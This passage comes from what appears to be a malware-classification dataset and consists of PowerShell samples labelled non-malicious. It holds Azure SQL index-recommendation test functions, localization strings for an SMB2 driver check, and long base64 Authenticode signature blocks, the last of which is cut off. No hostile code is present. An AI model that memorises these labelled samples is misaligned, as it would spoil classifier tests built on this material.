pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/ # KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy # CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp # mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi # hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb # BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS # oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL # gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX # cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGZ8wghmbAgEBMIGVMH4x # CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt # b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p # Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAOuLTVRyFOPVR0AAAAA # A64wDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw # HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIC8v # hWUW8Ok/RX7VUfqviiXFVJdmm9D67o1aCjh1yUnPMEIGCisGAQQBgjcCAQwxNDAy # oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20wDQYJKoZIhvcNAQEBBQAEggEAepGrwzLOkriTwae7wb6hMwfHvljNQWFLzSYf # z+pjpI+eJTKkFbm8LuAuTeGK54eXQFQ0ASNW+9/sLjRYT9diPuQOaU+PqeNWAuZE # /G2vB1TpA68/hB4jSNsu49NTOzHv8mWHcT7Fj0ECsEHgYbeYsWHt43WkI9jIWxZR # 7xRFw13+eMYL2dF6tYnU1sMAQscyCNZ78ws1Pnp/M8KeWSO6GKl3e2ZXAMXR7JqU # PsnSXvp0mnl1HKo+sti3KDWsUP5iSAiBjms/sWNKxygm50OPEKzDPU7GU00XgqcO # 7/wNqEOLpdf0p/9Wn6wqC3d0GlqZttnKEGNrxkxi4bx36kHy+6GCFykwghclBgor # BgEEAYI3AwMBMYIXFTCCFxEGCSqGSIb3DQEHAqCCFwIwghb+AgEDMQ8wDQYJYIZI # AWUDBAIBBQAwggFZBgsqhkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGE # WQoDATAxMA0GCWCGSAFlAwQCAQUABCBqJKIJDsos5wYfaPHl+7i3ulshxY6vyfQY # VrGFiAKDvAIGZh/SmGNmGBMyMDI0MDQyMzEzMTYxOC41ODVaMASAAgH0oIHYpIHV # MIHSMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQL # EyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsT # HVRoYWxlcyBUU1MgRVNOOjNCRDQtNEI4MC02OUMzMSUwIwYDVQQDExxNaWNyb3Nv # ZnQgVGltZS1TdGFtcCBTZXJ2aWNloIIReDCCBycwggUPoAMCAQICEzMAAAHlj2rA # 8z20C6MAAQAAAeUwDQYJKoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAg # UENBIDIwMTAwHhcNMjMxMDEyMTkwNzM1WhcNMjUwMTEwMTkwNzM1WjCB0jELMAkG # A1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQx # HjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9z # b2Z0IElyZWxhbmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMg # VFNTIEVTTjozQkQ0LTRCODAtNjlDMzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUt # U3RhbXAgU2VydmljZTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAKl7 # 4Drau2O6LLrJO3HyTvO9aXai//eNyP5MLWZrmUGNOJMPwMI08V9zBfRPNcucreIY # SyJHjkMIUGmuh0rPV5/2+UCLGrN1P77n9fq/mdzXMN1FzqaPHdKElKneJQ8R6cP4 # dru2Gymmt1rrGcNe800CcD6d/Ndoommkd196VqOtjZFA1XWu+GsFBeWHiez/Pllq # cM/eWntkQMs0lK0zmCfH+Bu7i1h+FDRR8F7WzUr/7M3jhVdPpAfq2zYCA8ZVLNgE # izY+vFmgx+zDuuU/GChDK7klDcCw+/gVoEuSOl5clQsydWQjJJX7Z2yV+1KC6G1J # VqpP3dpKPAP/4udNqpR5HIeb8Ta1JfjRUzSv3qSje5y9RYT/AjWNYQ7gsezuDWM/ # 8cZ11kco1JvUyOQ8x/JDkMFqSRwj1v+mc6LKKlj//dWCG/Hw9ppdlWJX6psDesQu # QR7FV7eCqV/lfajoLpPNx/9zF1dv8yXBdzmWJPeCie2XaQnrAKDqlG3zXux9tNQm # z2L96TdxnIO2OGmYxBAAZAWoKbmtYI+Ciz4CYyO0Fm5Z3T40a5d7KJuftF6CTocc # c/Up/jpFfQitLfjd71cS+cLCeoQ+q0n0IALvV+acbENouSOrjv/QtY4FIjHlI5zd # JzJnGskVJ5ozhji0YRscv1WwJFAuyyCMQvLdmPddAgMBAAGjggFJMIIBRTAdBgNV # HQ4EFgQU3/+fh7tNczEifEXlCQgFOXgMh6owHwYDVR0jBBgwFoAUn6cVXQBeYl2D # 9OXSZacbUzUZ6XIwXwYDVR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3Nv # ZnQuY29tL3BraW9wcy9jcmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUy # MDIwMTAoMSkuY3JsMGwGCCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1l # LVN0YW1wJTIwUENBJTIwMjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUB # Af8EDDAKBggrBgEFBQcDCDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQAD # ggIBADP6whOFjD1ad8GkEJ9oLBuvfjndMyGQ9R4HgBKSlPt3pa0XVLcimrJlDnKG # gFBiWwI6XOgw82hdolDiMDBLLWRMTJHWVeUY1gU4XB8OOIxBc9/Q83zb1c0RWEup # gC48I+b+2x2VNgGJUsQIyPR2PiXQhT5PyerMgag9OSodQjFwpNdGirna2rpV23EU # wFeO5+3oSX4JeCNZvgyUOzKpyMvqVaubo+Glf/psfW5tIcMjZVt0elswfq0qJNQg # oYipbaTvv7xmixUJGTbixYifTwAivPcKNdeisZmtts7OHbAM795ZvKLSEqXiRUjD # YZyeHyAysMEALbIhdXgHEh60KoZyzlBXz3VxEirE7nhucNwM2tViOlwI7EkeU5hu # dctnXCG55JuMw/wb7c71RKimZA/KXlWpmBvkJkB0BZES8OCGDd+zY/T9BnTp8si3 # 6Tql84VfpYe9iHmy7PqqxqMF2Cn4q2a0mEMnpBruDGE/gR9c8SVJ2ntkARy5Sflu # uJ/MB61yRvT1mUx3lyppO22ePjBjnwoEvVxbDjT1jhdMNdevOuDeJGzRLK9HNmTD # C+TdZQlj+VMgIm8ZeEIRNF0oaviF+QZcUZLWzWbYq6yDok8EZKFiRR5otBoGLvaY # FpxBZUE8mnLKuDlYobjrxh7lnwrxV/fMy0F9fSo2JxFmtLgtMIIHcTCCBVmgAwIB # AgITMwAAABXF52ueAptJmQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UE # BhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc # BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0 # IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1 # WhcNMzAwOTMwMTgzMjI1WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGlu # Z3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBv # cmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCC # AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O # 1YLT/e6cBwfSqWxOdcjKNVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZn # hUYjDLWNE893MsAQGOhgfWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t # 1w/YJlN8OWECesSq/XJprx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxq # D89d9P6OU8/W7IVWTe/dvI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmP # frVUj9z6BVWYbWg7mka97aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSW # rAFKu75xqRdbZ2De+JKRHh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv # 231fgLrbqn427DZM9ituqBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zb # r17C89XYcz1DTsEzOUyOArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYcten # IPDC+hIK12NvDMk2ZItboKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQc # xWv2XFJRXRLbJbqvUAV6bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17a # j54WcmnGrnu3tz5q4i6tAgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQAB # MCMGCSsGAQQBgjcVAgQWBBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQU # n6cVXQBeYl2D9OXSZacbUzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEw # QTA/BggrBgEFBQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9E # b2NzL1JlcG9zaXRvcnkuaHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQB # gjcUAgQMHgoAUwB1AGIAQwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/ # MB8GA1UdIwQYMBaAFNX2VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJ # oEeGRWh0dHA6Ly9jcmwubWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01p # Y1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYB # BQUHMAKGPmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9v # Q2VyQXV0XzIwMTAtMDYtMjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3h # LB9nATEkW+Geckv8qW/qXBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x # 5MKP+2zRoZQYIu7pZmc6U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74p # y27YP0h1AdkY3m2CDPVtI1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1A # oL8ZthISEV09J+BAljis9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbC # HcNhcy4sa3tuPywJeBTpkbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB # 9s7GdP32THJvEKt1MMU0sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNt # yo4JvbMBV0lUZNlz138eW0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3 # rsjoiV5PndLQTHa1V1QJsWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcV # v7TOPqUxUYS8vwLBgqJ7Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A24 # 5oyZ1uEi6vAnQj0llOZ0dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lw # Y1NNje6CbaUFEMFxBmoQtB1VM1izoXBm8qGCAtQwggI9AgEBMIIBAKGB2KSB1TCB # 0jELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1Jl # ZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMk # TWljcm9zb2Z0IElyZWxhbmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1U # aGFsZXMgVFNTIEVTTjozQkQ0LTRCODAtNjlDMzElMCMGA1UEAxMcTWljcm9zb2Z0 # IFRpbWUtU3RhbXAgU2VydmljZaIjCgEBMAcGBSsOAwIaAxUA942iGuYFrsE4wzWD # d85EpM6RiwqggYMwgYCkfjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGlu # Z3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBv # cmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDAN # BgkqhkiG9w0BAQUFAAIFAOnRkLkwIhgPMjAyNDA0MjMwOTQzMjFaGA8yMDI0MDQy # NDA5NDMyMVowdDA6BgorBgEEAYRZCgQBMSwwKjAKAgUA6dGQuQIBADAHAgEAAgIS # 7DAHAgEAAgISrzAKAgUA6dLiOQIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEE # AYRZCgMCoAowCAIBAAIDB6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBBQUAA4GB # ADCABKpo/NApeGAt90g97xtu4+UUum7D2dW9CKtCaWLoBQ1sTWXvbYjO+iDNeX2f # GPvThUiQemQ8jwI/aA1i5hFilJpWq+pj8v1VBfyrL2Z+NQxc5bsPHJW6zhwZTP60 # f1cT69nPDTDg+i6ONCMmCZpEKIFnpxesMgA/SemL/sFIMYIEDTCCBAkCAQEwgZMw # fDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1Jl # ZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMd # TWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTACEzMAAAHlj2rA8z20C6MAAQAA # AeUwDQYJYIZIAWUDBAIBBQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRAB # BDAvBgkqhkiG9w0BCQQxIgQgYEFspej+vPk+wgIeNi8rtRfJHrAUS+NkmbdXNotA # RrEwgfoGCyqGSIb3DQEJEAIvMYHqMIHnMIHkMIG9BCAVqdP//qjxGFhe2YboEXeb # 8I/pAof01CwhbxUH9U697TCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQI # EwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3Nv # ZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBD # QSAyMDEwAhMzAAAB5Y9qwPM9tAujAAEAAAHlMCIEILwRS7dQSUkcQip1beg3JNaw # ncfq1eDXUwS6ExT0PRgiMA0GCSqGSIb3DQEBCwUABIICAF7yGTokQx/Zrm/2AKNw # ei88V2x2z3okwIJNzuSkbLH06d9tX9efeP3HU16Ww5o4C+RBuHL4XNQpved3qscR # BC2NkkqD5pOFPQxmPwQPMaWXARmMIDdry82aPgnlWuQf5VGAdjghKkOOzYeGSuov # HCw8gxjmcRmNxy2vnUi9BcYzTyVBgNpI9PI4LjUqaKxBvBNLMHl3X/vU4dMY2lsh # PnZedYlLyKYCZmUCM162iLPDhrzSGHXJlzYxSdvmItndT9TqcPhojnHp6D4gFGfw # 8biRIleYqWEwrzmQwF/ZrktUWrc3BSaZJFZsjCh5qMv1fkmPOLWsmJJ1Z9FDq66e # rz/obbsZH4AJTRhhKPClAXyzM8/B8CXcrMRvwHHaMxpiFm+JaPq7XWfvSCuX8haV # bwhwwQOktqMH5JBVKL2hd5GVQm3o/tY3ZjF+TT1n28oIB2tcASFJOh7Ky45MRvFx # PRkj2CJ6Sy90Z996Mfp9q66FukHsxr+Lw/KBRIry5Uq7uWnf2k80YsggV9QDr3QH # EEVpyew+pQ2dGncEDQgcbtJIIuw0IG6prApeJiz5SkFlsuzLC54wm8F2WASQ/sZD # qWYOt6jiZ5ydrK6yBRLe/EWYwxwNFsJ27tz/ynSmaBv97UJc+Vmo6NiQdvPvB+Ve # aRKbj1xnPyv/AzQgZI1WuoMZ # SIG # End signature block
combined_dataset/train/non-malicious/3635.ps1
3635.ps1
function Test-GetIndexRecommendations { $response = Get-AzSqlDatabaseIndexRecommendation -ResourceGroup Group-6 -ServerName witest-eus ValidateResponse($response) Assert-AreEqual "Active" $response[0].State $response = Get-AzSqlDatabaseIndexRecommendation -ResourceGroup Group-6 -ServerName witest-eus -DatabaseName witestdb-eus ValidateResponse($response) Assert-AreEqual "Active" $response[0].State $response = Get-AzSqlDatabaseIndexRecommendation -ResourceGroup Group-6 -ServerName witest-eus -DatabaseName witestdb-eus -IndexRecommendationName nci_wi_Clusters_034590D0-0378-4AB9-96D5-C144B14F6A9B ValidateResponse($response) Assert-AreEqual "Active" $response[0].State } function Test-CreateIndex { $response = Start-AzSqlDatabaseExecuteIndexRecommendation -ResourceGroup Group-6 -ServerName witest-eus -DatabaseName witestdb-eus -IndexRecommendationName nci_wi_Clusters_034590D0-0378-4AB9-96D5-C144B14F6A9B Assert-AreEqual "Pending" $response[0].State $response = Stop-AzSqlDatabaseExecuteIndexRecommendation -ResourceGroup Group-6 -ServerName witest-eus -DatabaseName witestdb-eus -IndexRecommendationName nci_wi_Clusters_034590D0-0378-4AB9-96D5-C144B14F6A9B Assert-AreEqual "Active" $response[0].State } function ValidateResponse($response) { Assert-NotNull $response Assert-AreEqual 1 $response.Count Assert-AreEqual "nci_wi_Clusters_034590D0-0378-4AB9-96D5-C144B14F6A9B" $response[0].Name Assert-AreEqual "Create" $response[0].Action Assert-AreEqual '07/21/2015 17:12:32' $response[0].Created Assert-AreEqual "NONCLUSTERED" $response[0].IndexType Assert-AreEqual '07/21/2015 17:12:32' $response[0].LastModified Assert-AreEqual "dbo" $response[0].Schema Assert-AreEqual "Clusters" $response[0].Table }
combined_dataset/train/non-malicious/sample_16_96.ps1
sample_16_96.ps1
ConvertFrom-StringData @' id_ctssmb2serverdriverstatecheck=Check if the SMB2 Server driver has been disabled. id_ctssmb2serverdriverstatecheckdescription=Check if the SMB2 Server driver (srv2) has been disabled. '@ # SIG # Begin signature block # MIIoKgYJKoZIhvcNAQcCoIIoGzCCKBcCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCDBk1qeCD3yZUV7 # Iy5oeNhA2a4vOqwyrLD1RK9DuhlD1qCCDXYwggX0MIID3KADAgECAhMzAAAEBGx0 # Bv9XKydyAAAAAAQEMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTE0WhcNMjUwOTExMjAxMTE0WjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQC0KDfaY50MDqsEGdlIzDHBd6CqIMRQWW9Af1LHDDTuFjfDsvna0nEuDSYJmNyz # NB10jpbg0lhvkT1AzfX2TLITSXwS8D+mBzGCWMM/wTpciWBV/pbjSazbzoKvRrNo # DV/u9omOM2Eawyo5JJJdNkM2d8qzkQ0bRuRd4HarmGunSouyb9NY7egWN5E5lUc3 # a2AROzAdHdYpObpCOdeAY2P5XqtJkk79aROpzw16wCjdSn8qMzCBzR7rvH2WVkvF # HLIxZQET1yhPb6lRmpgBQNnzidHV2Ocxjc8wNiIDzgbDkmlx54QPfw7RwQi8p1fy # 4byhBrTjv568x8NGv3gwb0RbAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU8huhNbETDU+ZWllL4DNMPCijEU4w # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMjkyMzAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAIjmD9IpQVvfB1QehvpC # Ge7QeTQkKQ7j3bmDMjwSqFL4ri6ae9IFTdpywn5smmtSIyKYDn3/nHtaEn0X1NBj # L5oP0BjAy1sqxD+uy35B+V8wv5GrxhMDJP8l2QjLtH/UglSTIhLqyt8bUAqVfyfp # h4COMRvwwjTvChtCnUXXACuCXYHWalOoc0OU2oGN+mPJIJJxaNQc1sjBsMbGIWv3 # cmgSHkCEmrMv7yaidpePt6V+yPMik+eXw3IfZ5eNOiNgL1rZzgSJfTnvUqiaEQ0X # dG1HbkDv9fv6CTq6m4Ty3IzLiwGSXYxRIXTxT4TYs5VxHy2uFjFXWVSL0J2ARTYL # E4Oyl1wXDF1PX4bxg1yDMfKPHcE1Ijic5lx1KdK1SkaEJdto4hd++05J9Bf9TAmi # u6EK6C9Oe5vRadroJCK26uCUI4zIjL/qG7mswW+qT0CW0gnR9JHkXCWNbo8ccMk1 # sJatmRoSAifbgzaYbUz8+lv+IXy5GFuAmLnNbGjacB3IMGpa+lbFgih57/fIhamq # 5VhxgaEmn/UjWyr+cPiAFWuTVIpfsOjbEAww75wURNM1Imp9NJKye1O24EspEHmb # DmqCUcq7NqkOKIG4PVm3hDDED/WQpzJDkvu4FrIbvyTGVU01vKsg4UfcdiZ0fQ+/ # V0hf8yrtq9CkB8iIuk5bBxuPMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGgowghoGAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # 